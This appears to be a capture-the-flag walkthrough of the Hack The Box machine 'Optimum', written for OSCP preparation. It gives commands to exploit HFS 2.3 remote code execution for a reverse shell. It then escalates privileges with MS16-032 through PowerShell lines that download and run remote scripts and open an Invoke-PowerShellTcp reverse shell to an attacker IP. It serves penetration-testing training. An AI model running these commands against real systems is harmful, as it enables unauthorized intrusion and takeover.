Hack the Box is an online platform to test and advance your skills in penetration testing and cyber security.
In this series of articles we will show how junior evaluators complete some Hack The Box machines on their road to OSCP, a well-known and respected certification that many top cybersecurity positions require. Certified OSCPs are able to identify existing vulnerabilities and execute organized attacks in a controlled and focused manner. They can leverage or modify existing exploit code to their advantage, perform network pivoting and data exfiltration, and compromise systems that suffer from poor configurations.
Let's start with the fun!
Optimum
Initial Foothold
There is an HTTP File Server (HFS) version 2.3 on port 80. Running `searchsploit HFS`, we find one with RCE for version 2.3.x.
User
- Mirror the exploit: `searchsploit -m 39161.py`.
- Rename it: `mv 39161.py hts.py`.
- Start the listener: `ncat -lnvp 12345`.
- Modify the exploit to match our local IP address and the port 12345.
- Download `nc` for Windows: `wget https://eternallybored.org/misc/netcat/netcat-win32-1.11.zip`, unzip the file with `unzip netcat-win32-1.11.zip` and `cd` into it.
- (IMPORTANT) Replace `nc.exe` with the 64-bit binary: `rm nc.exe` and then `mv nc64.exe nc.exe`.
- Start an HTTP server on port 80: `python3 -m http.server 80`.
- Run the exploit twice: `python3 hts.py 10.10.10.8 80`.
- Our `ncat` listener should have caught a shell.
Root
Upgrade to a PowerShell shell (refer to the CMD cheatsheet). From there, we can download Sherlock.ps1 to quickly test for different CVEs. While Watson is better, it only supports Windows Server 2016 and 2019.
It looks like it's vulnerable to MS16-032.
If we use the one from exploit-db, it says it works but it does not spawn a shell. Apparently it tries to spawn a graphical terminal, so it does not work for us.
There is a modified version of the script on powershell-empire. Add the following line at the end:
`Invoke-MS16032 -Command "iex(New-Object Net.WebClient).DownloadString('http://10.10.14.31:8000/shell.ps1')"`
shell.ps1 also comes from powershell-empire, which is /usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1. Append this line to the end:
`Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.31 -Port 6969`
Set up a Python HTTP server: `python3 -m http.server` (the default port is 8000).
Set up a listener: `ncat -lnvp 6969`.
Finally, on the victim run: `IEX(New-Object Net.WebClient).downloadString('http://10.10.14.31:8000/Invoke-MS16032.ps1')`